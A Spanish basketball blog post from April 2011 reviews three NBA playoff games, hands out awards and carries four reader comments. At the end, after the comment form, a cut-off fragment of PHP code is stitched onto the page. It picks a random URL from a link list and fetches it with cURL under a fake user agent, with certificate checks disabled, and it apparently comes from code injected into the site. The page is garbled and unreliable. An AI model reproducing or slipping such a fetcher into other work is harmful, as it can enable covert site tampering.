Playoffs (27/04/2011): Resistiré

28 de April de 2011 por Viva_Dirk

“Resistiré”. Ese debe ser el lema de los Spurs después de ver como anoche se llevaron un partido que tenían perdido gracias a un triple casi sobre la bocina de Gary Neal, una jugada que reabre el debate acerca de la posibilidad de simplemente hacer falta cuando ganas de 3 y quedan pocos segundos por jugar. Un debate que no existe en la NBA y sé entre sus aficionados europeos. Si fuera seguidor de los Grizzlies estaría muy cabreado y pensando si la impresionante canasta de Neal no puede pesar demasiado en el 6º partido. Hasta ese momento Zach Randolph y Marc Gasol habían dominado el partido sumando entre ambos 37 puntos y 28 rebotes, y habían contado con la ayuda de un Conley más anotador que de costumbre. Por el bando tejano fue Manu Ginobili el que lideró a los suyos con 33 puntos en un partido muy de su estilo, incordiando en defensa y buscando el contacto en ataque para ir a la línea, Parker aceptó el reto de Conley y se fue a 24 puntos y 9 asistencias, mientras que Tim Duncan, visto el nivel actual de los pívots de Memphis, hizo lo que pudo. Tras forzar la prórroga, los Spurs no tuvieron ningún problema en llevarse el partido (103-110). Hay que destacar las 28 faltas que les sancionaron a los ositos por las 18 de San Antonio. El Alamo sigue pesando.

Por su parte, los Heat cerraron su serie frente a los Sixers a pesar del partidazo de la pareja de forwards formada por Iguodala y Brand. Desgraciadamente para Philadelphia, no tuvieron demasiada ayuda y se vieron lastrados por el horrible partido de Louis Williams que normalmente suele ser un revulsivo. Por los Heat, Wade&Lebron coquetearon con el triple doble. El escolta fue la punta de lanza de su equipo mientras James ejercía de point forward repartiendo juego y quedándose en solo 13 lanzamientos. Bosh completó un gran partido con 22-11 y Chalmers se fue hasta los 20 puntos con un 6 de 12 en triples (91-97).

Ya esperan en semifinales los Thunder que anoche sudaron sangre para eliminar a los Nuggets. Necesitaron las versión más bestia de Durant, un claro dominio bajo los aros para conseguirlo y un parcial horrible de Denver en los últimos minutos. Hasta los 41 puntos se fue la joven superestrella (14 puntos en los últimos 3 minutos y medio) y 51 rebotes consiguió su equipo frente a los 38 (sólo 4 ofensivos) de Denver. Ojo a la actuación de Ibaka con 1 punto y 5 pérdidas, a la vez que 8 rebotes y 9 tapones. En los Nuggets vimos hasta a 8 jugadores anotar 8 puntos o más sin llegar ninguno a 16. Habrá que ver como se mueven en los despachos este verano porque tienen piezas de sobra para formar un gran equipo (97-100).

PREMIOS

MVP: Kevin Durant lideró a los Thunders en un durísimo partido con 41 puntos, 5 rebotes, 2 tapones y un 14 de 27 en tiros. Dwyane Wade se quedó cerca del triple doble con 26 puntos, 11 rebotes y 7 asistencias. Manu Ginobili con 33 puntos, 6 rebotes, 6 asistencias y 4 robos evitó la eliminación de los Spurs… con un poco de ayuda de Gary Neal. Quedaos con la que más os guste.

Sorpresa: Ver a Mario Chalmers lanzar más tiros que Lebron James es algo que rara vez volveremos a ver, y si además el base acaba con 20 puntos y un 6 de 12 en triples menos aún. Que Gary Neal sea el encargado del tiro decisivo nos sorprende, pero un poco menos viendo que es Greg Popovich el que lo dirige.

Decepción: Apuntábamos al banco de los Sixers como clave. Anoche Louis Williams acabó con 4 puntos, 2 pérdidas, 0 rebotes, 0 asistencias y un 2 de 8 en tiros.

Mayor esfuerzo en vano: Zach Randolph hizo otro partidazo, 26 puntos, 11 rebotes y 6 asistencias que se fueron al limbo.

Comenta

4 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Q pasará en el sexto????? Aún asi no veo opciones de final de conferencia para ninguno de los dos contra los Thunder.

      Citar

  2. German dice:
    #2

    Increible lo de San Antonio, veremos como maneja la presion Memphis de cerrar la serie mañana.

    Vi el ultimo cuarto de Oklahoma-Denver… lo de Durant fue impresionante! Tengo una pregunta, en una jugada sacaron de banda y Durant recibio pisando la linea de mediocampo, un arbitro cobro campo atras pero finalmente termino repusiendo Oklahoma… la verdad no entendi bien que paso, alguien lo vio?

      Citar

  3. GreenPride dice:
    #3

    Por fin gran basket de playoffs cuando llegan los partidos decisivos.
    Hoy tengo que empezar por el final. Durant empieza a escribir una leyenda que salvo lesiones debe ser de las grandes. Impresionante actuación para dar la vuelta a un partido que parecía que se llevarían los Nuggets que se habían ido de 9 en el último cuarto. Cuando Brooks le leyó la cartilla a Westbrook que ha jugado 2 últimos partidos muy malos y le dijo que le diera el balón a Durant los Thunder remontaron. Ibaka impresionante en defensa aunque muy mal en ataque al igual que Perkins. A Denver le falta ahora un jugador decisivo para poder aspirar a algo más, ¿Cambios este verano?
    Otro gran partido del día fue el Spurs-Grizzlies. Por 2 veces se salvaron de la eliminación in extremis los texanos. Primero con un triple imposible de Manudo que le dieron de dos por pisar con la punta de la bota. Eso los dejaba a uno y tras los 2 libres de Zach, el maestro Popovich engañó a todos y le dió el triple decisivo para salvar la temporada a un rookie como Gary Neal con resultado de triplazo y prórroga. Lo tuvieron los Grizzlies pero más bien fue mérito y suerte de los Spurs escapar vivos. Los osos dominan dentro de la zona como quieren ante un Duncan envejecido y que sufre ante la defensa de Marc y en ataque Gasol y Zach hacen mucho daño. Sinceramente creo que los Spurs se van para casa en el 6º pero no hay que subestimar la experiencia de los texanos ni a Parker y Ginobilli que han empezado a atacar el aro en todas las posesiones y venderán cara su piel.
    En el otro partido los Heat sudaron para pasar de ronda y durante mucho tiempo se mantuvieron en el partido gracias a los triples sobre todo de Chalmers. Ahora empieza la hora de la verdad para ellos ante un equipo experimentado y con gran defensa como los Celtics. Pedazo de eliminatoria. Por los Sixers demasiado han hecho poniendoselo caro en casi todos los partidos a Miami. Buen conjunto el de Philly al que todavía le faltan varias piezas para poder pelear por cosas más serias

      Citar

  4. the wolf dice:
    #4

    como de seguro tiene que estar durant para a 14 segundos jugarse un tiro rodeado de tios en vez de dejarse hacer falta y meter los 2 libres xD
    por otro lado el tapon de ibaka a nene al final es escalofriante….y sin duda los ultimos cuartos de memphis – san antonio y de ock – denver ya estan guardados en mi disco duro porque merecen la pena ser guardados…que grande es manu y que grande es y va a ser durant

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>